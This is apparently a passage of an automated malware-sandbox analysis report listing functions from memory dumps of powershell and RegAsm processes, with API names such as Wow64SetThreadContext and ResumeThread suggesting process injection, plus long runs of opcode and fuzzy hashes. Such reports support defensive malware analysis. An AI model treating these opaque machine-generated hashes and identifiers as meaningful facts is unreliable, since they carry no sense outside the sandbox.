                                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 0517FCCF
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1713531774.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_5170000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ContextThreadWow64
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 983334009-0
                                                                                                                                    • Opcode ID: 28838df06c1e7bd98797851bfbe427d47233b72395c11de7d0f71ec80a39dbde
                                                                                                                                    • Instruction ID: 5385f72c1e45c4a6f459f741ecd2d2fd7feb24eac763b33a77fc80aa4937088a
                                                                                                                                    • Opcode Fuzzy Hash: 28838df06c1e7bd98797851bfbe427d47233b72395c11de7d0f71ec80a39dbde
                                                                                                                                    • Instruction Fuzzy Hash: 8531BCB5D012589FCB10CFA9D984AEEFBF0BF49320F14842AE415B7250C738A985CF54
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0517FB30 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 233 517fb30-517fbbe ResumeThread 236 517fbc7-517fc09 233->236 237 517fbc0-517fbc6 233->237 237->236
                                                                                                                                    APIs
                                                                                                                                    • ResumeThread.KERNELBASE(?), ref: 0517FBAE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1713531774.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_5170000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ResumeThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 947044025-0
                                                                                                                                    • Opcode ID: f085f1ada9492582a9f56c76535ad3373aa0aa6c9bfdd27f71598387ad79922f
                                                                                                                                    • Instruction ID: 61b3eecd5f0215c1347cf9c022727b9bb18b388ec18f52f47663859348cc288d
                                                                                                                                    • Opcode Fuzzy Hash: f085f1ada9492582a9f56c76535ad3373aa0aa6c9bfdd27f71598387ad79922f
                                                                                                                                    • Instruction Fuzzy Hash: 4D31ACB5D012589FCF14CFA9D584ADEFBB5AF49320F14942AE815B7310C735A941CF94
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0372D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1713093592.000000000372D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0372D000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_372d000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: eb4ca50e8b83c355454ebaf8e0dae571b201821b515dae36260e9ce1f469b405
                                                                                                                                    • Instruction ID: 33727e8c51514f2662c42806c8f27448f7611cb1c2f5e29e215bf4732fbde171
                                                                                                                                    • Opcode Fuzzy Hash: eb4ca50e8b83c355454ebaf8e0dae571b201821b515dae36260e9ce1f469b405
                                                                                                                                    • Instruction Fuzzy Hash: 14012B311083189AE730CA2ACD84767FF9CDF41324F0CC46AEC684F166C279D841C6B1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0372D007 Relevance: .0, Instructions: 44COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1713093592.000000000372D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0372D000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_372d000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9e36f0d279e8afe5f644670cabe8bd7bb7484095445f93a2e520cc97b7ac03c9
                                                                                                                                    • Instruction ID: 5081f81824d316af6b69cf98eb9607a76cbaa4ff582941dcc69abe00ecf93450
                                                                                                                                    • Opcode Fuzzy Hash: 9e36f0d279e8afe5f644670cabe8bd7bb7484095445f93a2e520cc97b7ac03c9
                                                                                                                                    • Instruction Fuzzy Hash: 8D012D6100E3C49ED7228B25C894B52BFB4EF47224F1DC0DBD8988F1A3C2699849C772
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Non-executed Functions

                                                                                                                                    Function 07D72810 Relevance: 9.2, Strings: 7, Instructions: 471COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1735395891.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_7d70000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4'^q$4'^q$4'^q$4'^q$Te^q$rcl$rcl
                                                                                                                                    • API String ID: 0-3099924009
                                                                                                                                    • Opcode ID: 3866b8e13c8712a5eb975f38bfcb7b6c2f28f9aea84f4c6be5af03b7ea2053a6
                                                                                                                                    • Instruction ID: 1b406d1879e7057e6528f40e3b5c88dde0c79c31d825ccb6cbcc5ef8d806df94
                                                                                                                                    • Opcode Fuzzy Hash: 3866b8e13c8712a5eb975f38bfcb7b6c2f28f9aea84f4c6be5af03b7ea2053a6
                                                                                                                                    • Instruction Fuzzy Hash: F8F126B1B002898FCB159F78C4446AAFBF2BF89320F1884AAD455CB355FB31E985C791
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07D717F8 Relevance: 6.5, Strings: 5, Instructions: 286COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1735395891.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_7d70000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                                                    • API String ID: 0-3272787073
                                                                                                                                    • Opcode ID: 1d88fa038b68e23b5175e220254512e0cf33ab10066f4063bd70e1dc0c7e9549
                                                                                                                                    • Instruction ID: 4612a9783f33be44cf10122e83e286afd70aac72cb36cecd3294ea08d9321a81
                                                                                                                                    • Opcode Fuzzy Hash: 1d88fa038b68e23b5175e220254512e0cf33ab10066f4063bd70e1dc0c7e9549
                                                                                                                                    • Instruction Fuzzy Hash: 7B9139B1B0420E9FC7249A6994002AAFBE6AFC6610F14867BD459CB351FB33C846C7A1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07D72F78 Relevance: 6.5, Strings: 5, Instructions: 268COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1735395891.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_7d70000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Te^q$Te^q$Te^q$XX^q$XX^q
                                                                                                                                    • API String ID: 0-2926705448
                                                                                                                                    • Opcode ID: c149ec0e900bb811a409ba3e636a27dc316a7a5461695bff2a2d5ae79760178f
                                                                                                                                    • Instruction ID: a102db45a5b1f0d4195ea61c98e878e341926c7d49b6cb95a09eddbb8468dbce
                                                                                                                                    • Opcode Fuzzy Hash: c149ec0e900bb811a409ba3e636a27dc316a7a5461695bff2a2d5ae79760178f
                                                                                                                                    • Instruction Fuzzy Hash: 439119B1B002469FCB149F7DD8446AAFBE2AFC5310F14846AE905CB355EB32CD41D7A1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07D703E0 Relevance: 5.2, Strings: 4, Instructions: 162COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1735395891.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_7d70000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 84al$84al$tP^q$tP^q
                                                                                                                                    • API String ID: 0-4061980018
                                                                                                                                    • Opcode ID: 1fbb145be944b9802b8f6cd79e77bea9fc0e83d7791346570dc942001918c25d
                                                                                                                                    • Instruction ID: daeae27cc41d9b522d9899cec325926159120f341a134a2a996277a68db4723b
                                                                                                                                    • Opcode Fuzzy Hash: 1fbb145be944b9802b8f6cd79e77bea9fc0e83d7791346570dc942001918c25d
                                                                                                                                    • Instruction Fuzzy Hash: 1E5178B1B042659FC724DB69D81066AFBE2BF85310F14C46EE989CF391EA31CC45C7A0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07D72604 Relevance: 5.1, Strings: 4, Instructions: 91COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1735395891.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_7d70000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4'^q$Te^q$XX^q$rcl
                                                                                                                                    • API String ID: 0-1992407008
                                                                                                                                    • Opcode ID: 56ec21ea166160c73a5a42b54e18f7886ba3c62cce0b6a2f4246a6a55ec343a0
                                                                                                                                    • Instruction ID: e0c145cd641504cb4c823a09b0e77854e271aca3c1294c6239c65506d9119544
                                                                                                                                    • Opcode Fuzzy Hash: 56ec21ea166160c73a5a42b54e18f7886ba3c62cce0b6a2f4246a6a55ec343a0
                                                                                                                                    • Instruction Fuzzy Hash: CF31A9B5B00296CBCB149E298654A6DF7F2FF88760F14806BD4958F215F734E981CB51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07D712C8 Relevance: 5.0, Strings: 4, Instructions: 48COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1735395891.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_7d70000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                    • API String ID: 0-2049395529
                                                                                                                                    • Opcode ID: 22bb0b26e2043350390701180051093efc8b8db9018a85fb7d004f504ccdbb1e
                                                                                                                                    • Instruction ID: f38d909adfe4fda1b3124fb0e776831b7cc43329fba086d5cd5fc58431ea2fec
                                                                                                                                    • Opcode Fuzzy Hash: 22bb0b26e2043350390701180051093efc8b8db9018a85fb7d004f504ccdbb1e
                                                                                                                                    • Instruction Fuzzy Hash: 4101A96170939E4FC72B12292C241656FF25FC3A507291597D085CF7ABDD2A8C8AC367
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Executed Functions

                                                                                                                                    Function 07AC5D30 Relevance: 14.9, Strings: 11, Instructions: 1153COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: (_^q$(_^q$,bq$4c^q$4c^q$Hbq$Nv]q$$^q$$^q$c^q$c^q
                                                                                                                                    • API String ID: 0-3459267885
                                                                                                                                    • Opcode ID: 3b23140f4595086a90cf243ba5447cd06daba2ac5f034fcee7723fb458d2d23d
                                                                                                                                    • Instruction ID: b31779792a0b7624a30898e91833377a45838166c443049f611181e0d513fcda
                                                                                                                                    • Opcode Fuzzy Hash: 3b23140f4595086a90cf243ba5447cd06daba2ac5f034fcee7723fb458d2d23d
                                                                                                                                    • Instruction Fuzzy Hash: C182DAB0B801199FCB69EB7D445026D6AE3BFCD740B2448AED016DF394EE35DC468B92
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07ACA018 Relevance: 13.2, Strings: 10, Instructions: 688COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4'^q$4c^q$4c^q$4c^q$4|cq$$^q$$^q$$^q$$^q$$^q
                                                                                                                                    • API String ID: 0-1675970643
                                                                                                                                    • Opcode ID: 9a99a717e09a2c9518249492d135021a015f8cf734f05a60900b78a6f14b0cc5
                                                                                                                                    • Instruction ID: 7edcb934ff3f5ec0f9168a2df25bff4b079f4b92b28d63fd6c660e2e8fcac2c9
                                                                                                                                    • Opcode Fuzzy Hash: 9a99a717e09a2c9518249492d135021a015f8cf734f05a60900b78a6f14b0cc5
                                                                                                                                    • Instruction Fuzzy Hash: C2427B70B0021A9FDB14DF79C854AAEBBF6BF89300F148469E51AEB364DB349D42CB51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07AC0040 Relevance: 6.7, Strings: 5, Instructions: 466COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Hbq$Hbq$Hbq$Hbq$Hbq
                                                                                                                                    • API String ID: 0-1677660839
                                                                                                                                    • Opcode ID: 962fbe86919ac219cf867f266f09f55096440271a48c50fce4d082853e6e82fe
                                                                                                                                    • Instruction ID: 94dd127bc5cf052da27e35331527c89cdf9b7a36f896c33aaaaf1531cb43b099
                                                                                                                                    • Opcode Fuzzy Hash: 962fbe86919ac219cf867f266f09f55096440271a48c50fce4d082853e6e82fe
                                                                                                                                    • Instruction Fuzzy Hash: 5C02D371A0025ACFCB15CF74D9502AEFBF2FF85300F24866ED556AB241E734AA85CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07ACF310 Relevance: 2.7, Strings: 2, Instructions: 201COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 1$v
                                                                                                                                    • API String ID: 0-2456183578
                                                                                                                                    • Opcode ID: 761864e67ee737d22bae5f23051e3daaa3202b3d0016f1a711e71e33b8be1325
                                                                                                                                    • Instruction ID: e00b2ed98d20b7e65067525b5187526c3c415d9e83bc7f47d8a557eef8ee2fde
                                                                                                                                    • Opcode Fuzzy Hash: 761864e67ee737d22bae5f23051e3daaa3202b3d0016f1a711e71e33b8be1325
                                                                                                                                    • Instruction Fuzzy Hash: 8E91B474E01218DFDB68DFA9D994A9DBBF2FF89300F1080AAD519AB354DB319942CF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07ACF301 Relevance: 2.7, Strings: 2, Instructions: 191COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 1$v
                                                                                                                                    • API String ID: 0-2456183578
                                                                                                                                    • Opcode ID: b6807742e2e17daf277265ce01d92409d068bb6bd75e26523e21c7ae91dc806e
                                                                                                                                    • Instruction ID: 15d85402708492a47fbaf7852fb7529eda6badb78b050b1f9e3426fe7d2be514
                                                                                                                                    • Opcode Fuzzy Hash: b6807742e2e17daf277265ce01d92409d068bb6bd75e26523e21c7ae91dc806e
                                                                                                                                    • Instruction Fuzzy Hash: 5291C474E01218DFDB68CFA9D990A9DBBB2FF89300F1080AAD519A7355DB315942CF51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07ACBD98 Relevance: 1.1, Instructions: 1098COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5de2c05d39364ff3f950440fb52daafc4660a536a5c6efd3372979e62f051dac
                                                                                                                                    • Instruction ID: d31d25a148fd745b4f314fa27c0b49ad5a57021d99cefc2510b9cb0d059ba234
                                                                                                                                    • Opcode Fuzzy Hash: 5de2c05d39364ff3f950440fb52daafc4660a536a5c6efd3372979e62f051dac
                                                                                                                                    • Instruction Fuzzy Hash: 27B2F4B4A01219DFDB24CF68C984B9DFBB1BB49314F1481E9E818AB356D731AE81CF50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07AC0D88 Relevance: .8, Instructions: 814COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: fc0c6fa2f105817a8afc3d6e9d4048c8fe5141476d6f436de4bc835d88ef7cfa
                                                                                                                                    • Instruction ID: 8ce04eb86870e930696ac5b2d24072be0e7d5e22ace73e43624e6fd3fecfe08f
                                                                                                                                    • Opcode Fuzzy Hash: fc0c6fa2f105817a8afc3d6e9d4048c8fe5141476d6f436de4bc835d88ef7cfa
                                                                                                                                    • Instruction Fuzzy Hash: 72828EF470021AEFDB64DF78C954B6977B1BB84308F1081A8D9299B762E734D846CF62
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 068567D8 Relevance: .6, Instructions: 563COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 088a74286d0cab81cc9754c6f992b0d952f5b79d053416bae579e33b68895ff7
                                                                                                                                    • Instruction ID: 34eaacb2c21eb8630af2766f1c41d6dcbe2985c4b0a4d207ebcf24ce2bdd4f49
                                                                                                                                    • Opcode Fuzzy Hash: 088a74286d0cab81cc9754c6f992b0d952f5b79d053416bae579e33b68895ff7
                                                                                                                                    • Instruction Fuzzy Hash: 3D22D131A0020A9FDB55DF68D880B9EBBF2FF84310F558569E905DB261EB31EC85CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05536948 Relevance: .5, Instructions: 499COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9d4508c073b0ffc45812fefa764aa23be62d657775cdcf09e888b5d51476e2c8
                                                                                                                                    • Instruction ID: 37bc2f1f57f3c2a6ba1597ed51fc28ad6c2da01df556e5622d8c49ed3f8f6047
                                                                                                                                    • Opcode Fuzzy Hash: 9d4508c073b0ffc45812fefa764aa23be62d657775cdcf09e888b5d51476e2c8
                                                                                                                                    • Instruction Fuzzy Hash: 88221374901229DFDB65DF65C958BE9BBB2FF89300F0084E9D509AB2A0CB359E84CF50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07ACD3D8 Relevance: .3, Instructions: 320COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 435da210aefd13c8c4b19745d9959bf00a5dcd952c9b405f56a57d1933436fae
                                                                                                                                    • Instruction ID: dedb16d73abf2157e885d070b8331764963eb56ee2384f49171fc2b6b6c3faa0
                                                                                                                                    • Opcode Fuzzy Hash: 435da210aefd13c8c4b19745d9959bf00a5dcd952c9b405f56a57d1933436fae
                                                                                                                                    • Instruction Fuzzy Hash: 7DE1E7B4E01219DFDB14DFA9C884B9DFBB2BF88304F2481A9D419AB355DB30A985CF50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0685A3D8 Relevance: .3, Instructions: 295COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 47223a0df806c680bdf51eed1c4c67c01fd57b71242c5154d3f928bd0925845b
                                                                                                                                    • Instruction ID: 5b1b008f274386ccc619a5a3d1fd3350fe088429deda77dfed6c14a509da8cb8
                                                                                                                                    • Opcode Fuzzy Hash: 47223a0df806c680bdf51eed1c4c67c01fd57b71242c5154d3f928bd0925845b
                                                                                                                                    • Instruction Fuzzy Hash: 5ED1D334900318CFCB58EFB4D854A9DBBB2FF8A301F1081A9D55AAB654DB319986CF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0685A3E8 Relevance: .3, Instructions: 289COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a8c927fab86bc681859c27526b016c7e30510319363843e3987faefcd3d8dede
                                                                                                                                    • Instruction ID: 8eb563490fdc4a6f8ac2efc547b7e646246700b23e8d5deb502f3c1bbc9cdac7
                                                                                                                                    • Opcode Fuzzy Hash: a8c927fab86bc681859c27526b016c7e30510319363843e3987faefcd3d8dede
                                                                                                                                    • Instruction Fuzzy Hash: A4D1C374A00318CFCB58EFB4D854A9DBBB2FF8A301F1085A9D51AAB654DB319985CF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05537C20 Relevance: .3, Instructions: 279COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d2876a61c5cd051c00b39b6a7b4f18b740314aede2321722536ca5a1ca1e6990
                                                                                                                                    • Instruction ID: c18964b38698507f42d29b3b6a9253d3b5ec32d7bb2631ac764c8dd6f1f6df5a
                                                                                                                                    • Opcode Fuzzy Hash: d2876a61c5cd051c00b39b6a7b4f18b740314aede2321722536ca5a1ca1e6990
                                                                                                                                    • Instruction Fuzzy Hash: 3EC1B474E04219CFDB14DFA9C990A9DBBB2FF89300F14D1AAD409AB355DB30A986CF51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05537C10 Relevance: .1, Instructions: 126COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: dd980122abd19f1c204a3a79fa1f755f6aa8760c461e7935002a6817b29c0984
                                                                                                                                    • Instruction ID: fccf601442f9352f5afca0ca1b6cac7ba89b1ba1a2886147225cf0539c31d3c7
                                                                                                                                    • Opcode Fuzzy Hash: dd980122abd19f1c204a3a79fa1f755f6aa8760c461e7935002a6817b29c0984
                                                                                                                                    • Instruction Fuzzy Hash: 7751A874E002198BEB18CFAAD950B9DFBB7BFC8300F14C1A9941DAB359DB3059858F50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 01695F50 Relevance: 93.3, Strings: 74, Instructions: 826COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
